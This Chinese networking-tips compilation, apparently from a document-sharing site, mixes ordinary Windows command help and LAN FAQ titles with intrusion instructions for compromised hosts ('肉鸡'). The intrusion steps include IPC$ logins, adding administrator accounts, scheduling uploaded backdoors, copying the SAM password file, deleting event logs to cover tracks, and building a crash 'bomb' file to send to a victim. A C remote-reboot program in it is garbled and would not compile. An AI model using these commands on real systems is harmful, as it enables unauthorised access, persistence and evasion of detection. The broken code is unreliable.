资源描述
网络基础知识大全
网络基础知识大全 1
此文章由51cto编辑 1
网络常用基础知识: 3
1)怎样查看本机所开端口: 3
2)怎样取得一个IP地址的主机名? 3
3)怎样查看本机的ip地址? 3
4)再使用net命令的时候遇到某些错误代码,怎样查看对应的错误信息? 4
5)利用telnet连接到对方主机上,想取得某些系统信息,用什么命令? 4
6)跟踪路由器的命令是什么? 4
7)简单简介一下cookie! 4
8)安装的时候,速度会尤其尤其尤其慢,怎么加快安装速度呢? 5
9)Windows2K密码忘掉了,怎样才能进入系统? 5
10)ping不到,tracert不到,不过却能用nbtstat显示对方的某些信息,为何? 5
11)telnet上去后,怎样给对方开共享? 5
12)怎样判断对方的详细操作系统版本? 5
13)怎样查看98的随机开启的程序? 6
14)设置了BIOS密码,可是却忘掉了,该怎么办? 6
15)怎样自制一个让98蓝屏的炸弹? 6
16)怎样再命令行下杀死对方进程? 7
17)上次说了ping的基本使用方法,这次谈谈ping的命令参数! 7
18)怎样查看本机的DNS服务器? 8
19)肉鸡上的部分文献无法删除,怎么办? 8
20)再说一个能够限制用户登陆时间的命令! 8
22)怎样删除windows2K的默认贡献? 8
23)139端口的又一使用方法 9
24)利用批处理文献来建立一个统计3389登陆者信息的统计器 10
25)网络命令小节 10
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的有关命令稍微简介一下!) 12
27)有关双系统的两个问题: 12
28)这里说几个主页恶意代码:『并不是让大家把这些代码加入到自己的主页中!只是希望大家能了解恶意代码,起到愈加好的防护作用!』 13
29)系统自带的系统工具 14
30)批处理在入侵中的几则妙用! 15
31)再说几个非常简单实用的DOS命令(工具): 15
32)ping命令的其他技巧: 17
局域网应用问题专题解答 (Rayi々) 18
1、问:我访问局域网中的计算机时,为何常常被提示要输入用户名和密码? 18
2、问:上网浏览前在局域网中应怎样对IE进行设置? 18
3、问:在局域网中应怎样设置OutLook Express收发邮件? 18
4、问:在由三台电脑组成的局域网中,我在其中一台电脑上用过Windows优化大师后,为何这台电脑就不能登录网络,并且还提示找不到拨号适配器? 18
5、问:怎样在局域网中设置QQ、ICQ等即时通讯软件? 18
6、问:我想用NetMeeting进行局域网中的通话,应当怎样设置? 19
7、问:我懂得在局域网内文献是能够共享的,但我想问的是,打印机和扫描仪应当怎样共享? 19
8、我用分机线上网,上网速度最大才48000bps,请问是何原因? 尚有,将Modem放在主机箱侧面,开机后(未打开Modem电源),家里的电话就处在忙音状态,怎样处理? 19
9、我新购的网卡在电脑上无法安装,而在其他电脑上却使用正常,这是怎么回事? 19
10、我的电脑出现“网上邻居”中找不到其他联网电脑的故障,怎样处理? 20
11、问:企业局域网,只有一台机器通过猫接入互联网,现想其他机器接入互联网,请问怎样实现? 20
12、问:局域网通过路由器、使用ADSL方式上网,怎样使各工作站迅速的取得能够上网的IP地址而不手工去指定? 20
13、问:企业要组建局域网,需要用到邮件服务器和WWW服务器,请问这两种服务放到一台电脑里还是分别用两台电脑?都用什么软件?谢谢! 20
14、问:家里原先有一台PII的计算机,最近又新增一台P4机器,操作系统都为Windows 98且已安装网卡,目前我想把他们联起来共享资源,该怎么办? 20
15、问:办公室机器桌面的“网上邻居”图标没了,能上Internet,但无法浏览其他机器上的资源了,怎么办? 21
16、问:办公室机器桌面的网上邻居图标处理了且也能浏览其他机器的共享资源了,但发觉右键中的“共享”命令没了!怎么办? 21
17、问:右键中的“共享”命令已经显身!但我设了共享不想让他人从网上邻居中看到这个共享目录,只有自己懂得且能实现异地机上有完全操作的权限。 21
18、问:一块PCI总线的10/100自适应网卡,无法正常工作。重要表目前网络时断时续,无论是不是Ping自己的IP地址,还是Ping对方的IP地址,都有这种情况发生。查看网卡的指示灯也出现同样的现象。 21
19、问:我的电脑与一个对等网连接好了,但不能读他人电脑上的数据,这是怎么回事? 21
20、问:我的网络从集线器升级为互换机后,感觉速度并没有多大提升,是什么原因? 22
21、问:VLAN是什么意思,使用它有什么好处? 22
22、问:我的自适应网卡只有红灯闪烁,绿灯不亮,这种情况正常吗? 22
23、问:怎样使用互换机的UpLink端口,怎样连接?使用了UpLink口后,是否还能够使用其相邻最近的端口? 22
24、问:我在安装网卡后,在“系统→设备管理器”中网卡出现黄色的“!”号,请问该怎样处理? 23
25.问:ADSL上网网页打不开的问题? 23
网络常用基础知识:
1)怎样查看本机所开端口:
用netstat -a —n命令查看!再stat下面有某些英文,我来简单说一下这些英文详细都代表什么
LISTEN:侦听来自远方的TCP端口的连接祈求
SYN-SENT:再发送连接祈求后等候匹配的连接祈求
SYN-RECEIVED:再收到和发送一个连接祈求后等候对方对连接祈求确实认
ESTABLISHED:代表一个打开的连接
FIN-WAIT-1:等候远程TCP连接中断祈求,或先前的连接中断祈求确实认
FIN-WAIT-2:从远程TCP等候连接中断祈求
CLOSE-WAIT:等候从本地用户发来的连接中断祈求
CLOSING:等候远程TCP对连接中断确实认
LAST-ACK:等候本来的发向远程TCP的连接中断祈求确实认
TIME-WAIT:等候足够的时间以确保远程TCP接收到连接中断祈求确实认
CLOSED:没有任何连接状态
2)怎样取得一个IP地址的主机名?
利用ping -a ip 命令查看!再第一行的pinging背面的 『ip』前面的英文就是对方主机名!
同样道理,利用ping machine_name也能够得到对方的ip
取得一个网站的ip地址的措施是:ping
www.***.com
例如想懂得sohu的ip,就用ping
顺便说一句:假如返回:Reply from *.*.*.*: TTL expired in transit的话,呵呵,代表TTL(生命周期)在传输过程中过期
什么意思呢?我来解释一下!
导致这个问题出现的原因有两个:1)TTL值太小!TTL值小于你和对方主机之间通过的路由器数目。 2)路由器数量太多,通过路由器的数量不小于TTL值!
呵呵,其实这两点是一个意思!只不过说法不一样而已!
3)怎样查看本机的ip地址?
用ipconfig来查看就能够!
也能够再Windows中的开始菜单,运行中输入winipcfg,同样能够看到自己的ip
ipconfig命令背面假如加一个参数 /all的话,能够得到愈加详细的资料,例如DNS、网关等……
4)再使用net命令的时候遇到某些错误代码,怎样查看对应的错误信息?
用命令 net helpmsg erorr_code来查看就能够了
例如错误代码为:88
则查看命令为:net helpmsg 88 下面有这个错误代码的中文显示!
5)利用telnet连接到对方主机上,想取得某些系统信息,用什么命令?
set命令能够很好的完成你所需要搜集信息的任务的!
措施:再cmd下直接输入set(telnet对方主机以后,也是直接set就能够了~然后能够得到NNNNN多的信息)
再这里,computername:呵呵,还用说么?主机名!
OS=Windows_NT :操作系统的类型哦~
path=C:\perl\bin\ :(perl的解释器位置!)
systemDrive=c: 操作系统盘符!
USERNAME=coldcrysky 目前登陆使用机器的用户
……
6)跟踪路由器的命令是什么?
tracert 格式:tracert ip
中间会列出所有通过的路由器列表!这些路由器假如是暴露再防火墙外面的话,还能够看到路由的IP哦~呵呵(这里又包括到了另外一个问题:为何要把路由放在防火墙背面?原因呢,重要有两点:1)保护路由器!因为目前越来越多的袭击和入侵已经开始瞄准路由器了~假如直接把路由暴露在外面,呵呵,是非常危险的!被DoS了就不好了啊~呵呵,因此要放在防火墙里面;2)为路由器减少负担!假如所有的过滤功效统统都压在路由器上面,呵呵,路由器的负担就太大了!)
当然,利用pathping也能够达成同样效果!格式与tracert同样!
7)简单简介一下cookie!
cookie,又名小甜点。
它的作用:统计访问者的某些信息。例如利用cookie统计你所登陆这个网页的次数、登陆时曾经输入的信息……
最常见的是,大家再登陆论坛(邮箱)的时候,常常在输入第一个字母的时候,往往下面就显示出了所有在本机登陆过该论坛(邮箱)的用户名吧?呵呵,这个就是cookie的作用!
大家在Administrator的cookies目录中能够看到诸多的记事本文档吧?这些都是cookie,虽然通过了加密,不过仔细查找的话,仍然能够看到某些敏感信息!况且目前也已经有了专门查看cookie的软件!利用这些软件,你的隐私将不保哦~
那么,怎样清除cookie呢?一般情况下,能够在Internet选项中的常规选项卡中看到一个删除cookies的按钮,点击就能够清楚掉了~
除此以外,还要在internet选项中的内容选项卡中找到自动完成按钮,把里面的四项都选中!然后点击清除表单,清除密码~
然后到操作系统目录所在的分区中!进入Winnt(98为windows)目录(当然了,这些都是默认的目录!假如你安装的时候更名了,就对应的去对应目录)之后找到Temporary Internet Files目录(的目录在c:\Documents and settings\administrator\Local settings\Temporary Internet Files)98直接到windows目录下找Temporary Internet Files就能够了~,找到这个文献夹后,打开!看到里面有NNNNNNNNNNNN多的文献了么?呵呵,这些是你浏览过的网页的统计(有的时候从网站上面看到漂亮的FLASH,可是不能保存怎么办?只要在线浏览一遍以后,断线到这里来找*.swf,之后依次打开查看的话,相信你会找到你所需要的FLASH的!),好了,跑题了~继续说:这些文献是网站的页面统计,直接删除就能够了!
另外,有无彻底严禁cookie的措施呢?
呵呵,当然有了!在IE的Internet选项中,找到隐私选项卡!,把里面的滑块拖到最上面,边上写着:制止所有cookie,呵呵,是不是?
另外一个措施:找到Windows目录下的cookies目录!把里面的txt文献所有删除!,最后应当只剩余一个index.dat文献!之后把这个文献夹设置成只读就能够了~
不过,严禁cookie后,大部分的论坛都无法正常登陆了啊!呵呵,到底严禁不严禁就看你自己的了~
8)安装的时候,速度会尤其尤其尤其慢,怎么加快安装速度呢?
在DOS上面安装,应当用98开启光盘来引导系统!然后按照下面的措施来做,能够提升安装速度:
g:\>cd windows -------假设G为光驱 windows为98的安装目录!
g:\windows>smartdrv -------加载smartdrv程序!加载后没有任何提示信息!只要不返回错误信息就是加载成功了~这时候安装2K的话,速度会很快的哦~
9)Windows2K密码忘掉了,怎样才能进入系统?
Windows2K的用户配备信息和密码保存在SAM文献里!该文献位于:c:\winnt\system32\config目录中!只要删除这个文献就能够了~
另外,在c:\winnt\repair目录中也同样有一个SAM文献(这个是前者的备份!)假如你在登陆肉鸡的时候,copy前面那个目录中的SAM文献,你会发觉COPY不下来!呵呵,为何?因为运行着的2K系统会保护SAM文献啊~这个时候你就COPY这个就能够了!
10)ping不到,tracert不到,不过却能用nbtstat显示对方的某些信息,为何?
因为tracert和ping命令使用的是ICMP协议!而nbtstat是通过对方的netbios端口来取得对方的主机信息的!使用的是UDP和TCP协议!假如对方仅仅只对ICMP协议做了严禁的话,那通过这个命令取得系统信息是正常的!
11)telnet上去后,怎样给对方开共享?
开共享的命令如下:net share c=c:\winnt\system 返回共享成功
之后直接利用\\ip\c来访问对方的system目录了~删除共享用
share c /del 命令就能够了
12)怎样判断对方的详细操作系统版本?
首先用ver命令查看对方的版本号!
假如是5.00.2195的话,为2K;5.1.2600为XP
从这里能够辨别出来到底是2K还是XP了~下面进行愈加详细的辨别!
2K的pro和svr版本辨别:
在telnet下,net shart查看开启的服务~假如对方开启了Terminal Services服务的话,基本上能够判断为svr以上的版本了~假如没有开启,则为pro!(详细措施有三种,因为前几天在论坛中我回复过暗界了~因此这里就不再重复了~)
XP的pro和home版的辨别:
home edition是无法安装iis的!因此,能够通过iis服务来判断到底是home版或者是pro了~
当然了,假如对方是pro,不过将iis删除(停用)的话,就没措施判断了~呵呵
13)怎样查看98的随机开启的程序?
在98下有一个实用配备程序(msconfig),中文名为:系统配备实用程序,调用的措施是在:开始--运行中输入msconfig,在里面,有一个开启的选项卡,点击后,能够看到诸多随即开启程序,假如前面带有钩的话,就是开启时随机开启的,取消的话就是把前面的小钩去掉就能够了~(假如在这里查看到了某些未知的开启文献--例如没有文献的详细途径,或者没有文献名的话,最佳取消它的自开启!因为很有也许是木马!)
除了这里以外,尚有config.sys、autoexec.bat、system.ini、win.ini几个选项卡,他们分别对应这几个文献!只不过在这里更以便查看而已!
14)设置了BIOS密码,可是却忘掉了,该怎么办?
假如是能够进入Windows的话,能够找找biospwds和cmospwd这两个软件看看~
尚有利用DEBUG法:
简单简介两种:
1)-o 70 16
-o 71 13
-q
2)-o 70 16
-o 71 16
-q
另一个措施:copy法:
copy con
输入下面10个字符:alt+176,alt+17,alt+230, p,alt+176,alt+20,alt+230,q,alt+205,空格,然后按下F6并回车,退出,运行这个程序就能够了~
恩,假如不能进入Windows怎么办呢?
简单简介两种措施:
1)用通用密码:
Award Bios密码:j256,LKW-PPETER,wantgirl,EBBB,Syxz,AWARD? SW,AWARD_SW,j262,HLT SER,SKY_FOX,BIOSTAR,ALFARO_ME,lkwpeter,589721,awkard,h996,CONCAT,589589
AMI bios密码:AMI,BIOS,PASSWORD,HEWITT RAND,AMI_SW,LKWPETER,A.M.I.
这是常见的密码,不妨试试~
假如不行的话,能够利用CMOS放电:
就是把主板上的电池取下来,等一会儿再插上去~
15)怎样自制一个让98蓝屏的炸弹?
恩,这个是前几天QQ上面朋友问我的问题,整顿的时候忽然间想起来了,就写一下好了~
首先,打开Word,再插入菜单中选择对象,这时,弹出对象包装程序窗口,再这个窗口中,点击导入,随便找一个文本或者程序就能够!之后点:编辑菜单。这里选择命令行,出现一个命令行窗口,在里面协商c:\con\con,点击保存,完成后,再点编辑包中的复制包,把他随便到一个地方复制下来,之后看到的是一个名位片断的东西!给这个文献起一个名字,呵呵,传给那个可怜的家伙吧,等候他蓝屏,掉线!
(这个命令行中能够插入诸多的命令,不见得非要用这个98蓝屏漏洞哦~)顺便说一下:这个已经不是什么新鲜的技术了,这个技术的名字叫做:碎片对象。呵呵,碎片?记忆碎片么?不是的!他的后缀是:.shs!之因此说一下这个,是因为有的朋友还不懂得~做一个整顿而已!不懂得的朋友看过后就懂得了,懂得的朋友就权当复习了~另外,不要利用这个措施做破坏!否则后果自负!
16)怎样再命令行下杀死对方进程?
利用微软的2K以上操作系统都是含有这个工具的!该工具包括在2K光盘的\support\tools文献夹下!里面有安装程序,点击后,就安装了2K的support tools工具包,里面有kill这个工具,这时候再cmd下能够输入kill/?,就能够看到协助了,使用这个命令的格式是:kill pid (pid是进程的ID号!)再任务管理器中能够看到进程的ID号!(不懂得有几位朋友用过蓝色火焰?呵呵,使用方法跟这个一摸同样!尚有诸多类似的木马、后门软件都有类似的功效!这个是windows自带的大木马『后门工具』而已!)
这时候,有朋友问了,那再命令行下怎样查看进程呢?呵呵,这就用到了系统自带的有一个后门工具了:再刚才说得那个目录中,尚有一个工具叫tlist 看名字就能看出来是干什么的吧?使用方法更简单!直接输入tlist就能够得到pid遇队形程序的列表了~
那对方机器假如没有安装这两个程序怎么办呢?没关系,你把你操作系统盘符下面programfiles\support tools目录下面的这两个对应的exe文献上传到对方的winnt\system32目录中就能够了!呵呵~
17)上次说了ping的基本使用方法,这次谈谈ping的命令参数!
这个是本次问题集的重点部分!无论是小鸟还是老鸟,你们能确保你真的对这些参数了如指掌么?恐怕都未必!还是好好看看吧!
这是TCP/IP协议中最有用的命令之一
它给另一个系统发送一系列的数据包,该系统自身又发回一个响应,这条实用程序对查找远程主机很有用,它返回的成果表示是否能抵达主机,宿主机发送一个返回数据包需要多长时间。
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until interrupted.(除非人为中断,否则一直ping下去)
-a Resolve addresses to hostnames.(把IP转为主机名)
-n count Number of echo requests to send.(响应祈求的数量)
-l size Send buffer size.(封包的大小)
-f Set Don`t Fragment flag in packet.(信息包中无碎片)
-i TTL Time To Live.(时间)
-v TOS Type Of Service.(服务类型)
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.(较严格的……唉,怎么译好……算了,放着吧)
-w timeout Timeout in milliseconds to wait for each reply.(timeout的时间)
例如大家也许都懂得的一个命令 # ping -f -s 65000 ***.***.***.***或者前阶段大家所谓ping死霉国佬时所用的命令(当然这么只会导致我方自己的网络阻塞)。
其实这个命令重要是用来看对方应答的速度,假如怎么ping 得到的成果都是request time out。那恐怕你根本就不用你去找这台主机了,它不在你的射程之内。
18)怎样查看本机的DNS服务器?
ipconfig其实是能够的(呵呵,上次就简介过这个命令),除此以外,还能够利用一个命令:再cmd下输入netsh,进入到netsh>提示符,再输入:int ip 进入到interface ip> 然后再次输入dump,这时候屏幕上出现目前连接的配备情况了
这里必须简介一下netsh到底是作什么用的!这个命令比较复杂,他包括了诸多的子命令,因此这里只对部分命令进行讲解:
1)查看本机IP:首先键入netsh,再netsh>提示符下输入:interface 回车 之后:ip 回车 再之后:show address 回车 这么,就能够看到目前连接的IP地址和子网掩码。(其实这个命令不如ipconfig简单,也不如ipconfig/all全面)
2)修改网络配备:接着上面的命令,我们使用:set address name=“本地连接” source=static addr=192.168.0.200 mask=255.255.255.0,这么就修改了目前的IP地址,用show address来看看(或者用ipconfig)
3)显示一个完整的网络配备教本:
刚才说过,第一个命令显示的信息不如ipconfig/all全面,不用着急,netsh再打印显示网络配备上,还是有自己的特色的!例如:再interface ip>状态下输入:dump,会显示一个清单,显示所有本地连接(无论你是否使用~)与netstat -an不完全同样!
这就是netsh的简单简介和最基础的使用方法!希望大家能够掌握!还能够输入?来查看协助!(要在netsh>提示符下才能查看协助啊~)
19)肉鸡上的部分文献无法删除,怎么办?
假如对方的文献夹是只读的话,会出现拒绝访问的字样!这时候,我们能够再del命令背面加上/f参数来删除!
20)再说一个能够限制用户登陆时间的命令!
再net命令中就能够实现这么的功效!详细措施如下:
假如我们打算让:coldcrysky这个用户再周日到周易的上午八点到下午四点之间能够登陆,用这个命令:
net user coldcrysky /timesunday-monday,08:00-16:00
之后利用net user coldcrysky命令来查看登陆时间的限制,能够看到是我们所要求的时间(因为是中文的,很轻易懂,我就不多废话了)
在此,尤其提示各位:命令中:星期日才是一周的开始!!!不要当成星期一!
光说了怎么设置,假如想恢复回去怎么办呢?(就是恢复成默认状态,任何时间都能够登陆的状态)
看我的:net user coldcrysky /time:all --这么就能够了~
22)怎样删除windows2K的默认贡献?
首先打开记事本,输入如下内容:
net share c$ /delete
net share d$ /delete
net share e$ /delete
net share f$ /delete
net share g$ /delete
net share ipc$ /delete
net share admin$ /delete
这里的c$、d$、e$……是代表默认共享的盘符~又几个就设置几个就能够了~
之后点击保存成批处理文献(后缀为:bat的文献!)!加入到开启组中就能够了~
23)139端口的又一使用方法
呵呵,写这个帖子的原因是因为我答应给一个朋友回复139端口的作用来着……先申明两点:1)不要利用本帖所提到的措施去搞恶意破坏!2)呵呵,也许许多人已经懂得了139端口这个使用方法了~本文只想起到一个抛砖引玉的作用!
废话不多说了~开始:
假如你使用NT主机的话,那你可要注意了!
重启NT主机的措施如下:
1:Net use \\XXX.XXX.XXX.XXX\ipc$ "password" /user:"username"
建立一个IPC连接
2:net use H: \\XXX.XXX.XXX.XXX\C$
将对方的C盘映射为自己的h盘
3:copy c on h:\reboot.bat
Iisreset /reboot
CTRL+Z
在对方的C盘上生成一个能重启机器的文献
4:net time \\XXX.XXX.XXX.XXX
得到对方机器时间
5:at \\XXX.XXX.XXX.XXX 重启的时间 c:\reboot.bat
设定对方重启的时间!
6:at \\XXX.XXX.XXX.XXX
查看任务上面是否添加了这个任务
7:等对方重启好了~
上面的第三步是only for Win2K的,假如是Nt,就需要用意个指定的重启程序,我们能够自己编写一个reboot.exe来替代reboot.bat,代码如下:
#include "stdio.h"
#include "windows.h"
int main()
{
文献://定义重启的时候发送给所有用户的消息
LPSTR msg="Reboot Tool By LionHook\n";;
文献://尝试用最简单的API函数重启
if(ExitWindowXXX(EWX_REBOOT.0))return TRUE;
if(ExitWindowXXX(EWX_REBOOT | EWX_FORCE,0))return TRUE;
文献://因为上面的重启不成功,因此需要调整本进程的特权
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |TOKEN_QUERY,&hToken)) return FALSE;
文献://获取重启的特权 SE_SHUTDOWN_NAME
LookupPrivilegevalues(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,FALSE,&tkp,0,(POTKEN_PRIVILEGES)NULL,0);
文献://判断是NT内核还是9X内核,选择用不一样的方式
if(!GetVersion()& 0x80000000))
InitiateSystemShutdown(NULL,msg,20,TRUE,TRUE);
else if (!ExitWindowXXX(EWX_REBOOT,0))
if(!ExitWindowXXX(EWX_REBOOT|EWX_FORCE,0))
return FALSE;
return TRUE;
对了,再次阐明啊,别用本文提到的措施搞破坏,小心警察叔叔打PP~呵呵
24)利用批处理文献来建立一个统计3389登陆者信息的统计器
因为Terminal Service默认是没有日志统计的,只能依托他的系统日志,不过系统日志只能统计某些大动作(开启或停止服务),那么,怎样用批处理文献来编写一个将是3389端口的程序呢?很简单:
建立一个批处理文献:内容如下:
@echo off
date/t >> c:\3389log.txt
:TS3389
time/t >> c:\3389log.txt
netstat -an | find "3389" |find "ESTABLISHED" >>c:\3389log.txt
goto :TS3389
之后保存!
假如有人用你的3389登陆你的机器,呵呵,在c盘下就有3389log.txt这个文献!统计了当日日志,尚有连接时间……资料~开始还击~呵呵
25)网络命令小节
A、NET命令:
IPC连接:格式 net use \\对方IP\ipc$ "密码" user:"用户名" 『建立IPC连接~』
net use \\对方IP\ipc$ /delete 『断开连接~』
如下操作需要在连接到对方主机后才可进行!!!
net user coldcrysky xyz /add 『在连接的目标主机中加入一个用户名为COLDCRYSKY 密码为WYZ的用户』
net localgroup Administrator coldcrysky /add 『把名为coldcrysky的用户加入ADMIN组-以为着权限的提升啊!!!^_^』
net use z:\\对方IP\C$ 『把对方的C盘映射为本机的Z盘-可依照需要更改映射盘符!』
net start telnet 『开启TELNET』
net user guest /active:yes 『激活GUEST』
net user guest coldcrysky 『把GUEST密码改为COLDCRYSKY』
B、AT命令:
查看远程机时间:net time \\对方IP
加入一项新任务:
at \\对方IP 时间 文献名 『用来把自己上传的后门程序在制定期间运行,以便以后进入肉鸡!』
C、TELNET命令:
telnet 对方IP 端口 『作用不用我说了吧???』
D、FTP命令:
登陆:ftp 对方网址(IP地址)
上传文献:get 文献在本机完整途径 对方文献存储完整途径
下载文献:put 对方文献完整途径 本机存储文献途径
E、COPY命令:
在建立连接后(尤其是IPC$连接后,很有用的命令哦~)
⑴copy index.htm \\127.0.0.1\c$\index.htm
『将本机index.htm文献复制到127.0.0.1的C盘下,假如要放到对方的NT目录下,则把C改为admin$』
⑵copy \\127.0.0.1\admin\repair\sam_ c: 『将远程机数据库文献拷贝到本机C盘根目录下』F、SET命令:
重要用于分析目标计算机的基本信息用!详细使用措施请查找有关文献!
G、NBTSTAT命令:
nbtstat -A 对方IP (这个A大写)
『在其中显示前面的英文或数字就是计算机名称!当然,也能够利用PING -A 对方ip的措施来查看对方主机名!效果相同!!!』
H、SHUTDOWN命令:
『用来关闭对方NT服务的命令』格式如下:
shutdown \\IP地址 t:20
『20秒后自动关闭对方NT服务!因为对对方机器影响较大,慎用!!!』
I、DIR命令:
还用我说么?大家是不是早就该掌握了???(不懂得的还是查阅有关资料吧~~~)
J、ECHO命令:
echo coldcrysky >index.htm 『用coldcrysky覆盖掉原INDEX.HTM中所有内容』
echo coldcrysky >>index.htm 『把coldcrysky加入到index.htm中』
K、ATTRIB命令:
更改文献属性用,格式:
Attrib -r index.htm 『去掉只读属性』(+- 分别代表增加和减少)
L、DEL命令:
『删除日志的时候用!』
del c:\winnt\system32\logfiles\*.*
del c:\winnt\system32\config\*.evt
del c:\winnt\system32\dtclog\*.*
del c:\winnt\system32\*.log
del c:\winnt\system32\*.txt
del c:\winnt\*.txt
del c:\winnt\*.log
M、PING命令:
-t :ping制定IP,懂得网络断开或按CTRL+C结束!
-a :解释PING IP的主机名
-n count :发送count指定的ECHO数据包,默以为4个!
26)这里我必须(或者说不得不重新重申一个命令!不过说之前我要把这个命令的有关命令稍微简介一下!)
我要说的命令就是:开启服务和停止服务的net start and net stop
这两个命令大多数朋友已经很熟悉了吧?不过为了以便更多的菜鸟能看明白我要说的意思,不用再看其他有关文章,因此我简单说两句:net start是开启服务!那么,怎样开启呢?例如,我们这里要开启telnet服务,那就直接再2K的cmd下输入:net start telnet就OK了~关闭一项服务的话,把start换成stop就OK了~不过这里必须要注意:你所关闭的服务必须是已经开启的服务!!!仿佛是一句废话
OK,有了这个前提后,下面就继续简介:那么,net start和net stop到底能开启什么服务?其实这点也不需要你强记,记住这个命令就能够了:net help start和net help stop,这两个会显示出你所能开启的服务有那些~~
这里例如我们查到了这个服务“CLIENT SERVICE FOR NETWARE”,那么当这个命令使用net start和net stop的时候,你必须在这项服务上面加上“”,原因是因为这个服务名称中带有空格!假如服务名称中不带空格,你能够不用带这个引号!!!这点是我强调的问题!大家一定不要忘掉了!『前些天看到S8S的黑白新区中有人说net start 和 net stop背面的服务名必须带空格是错误的!明白原因了吧?』
27)有关双系统的两个问题:
A、怎样在双系统(98、)中安全删除2K?
先制作一张Windows 98 的开启软盘,再用它开启你的计算机,运行sys命令恢复Windows 98引导统计后,再运行fdisk/mbr恢复主引导统计,完成后进入Windows 98,把winnt 和system volumn information 目录删除,再删掉C盘上的boot.ini、bootfont.bin、ntldr、、bootsect.dos文献就行了。
B、 Windows 98/XP双系统开启菜单修复
1.修复前,在
展开阅读全文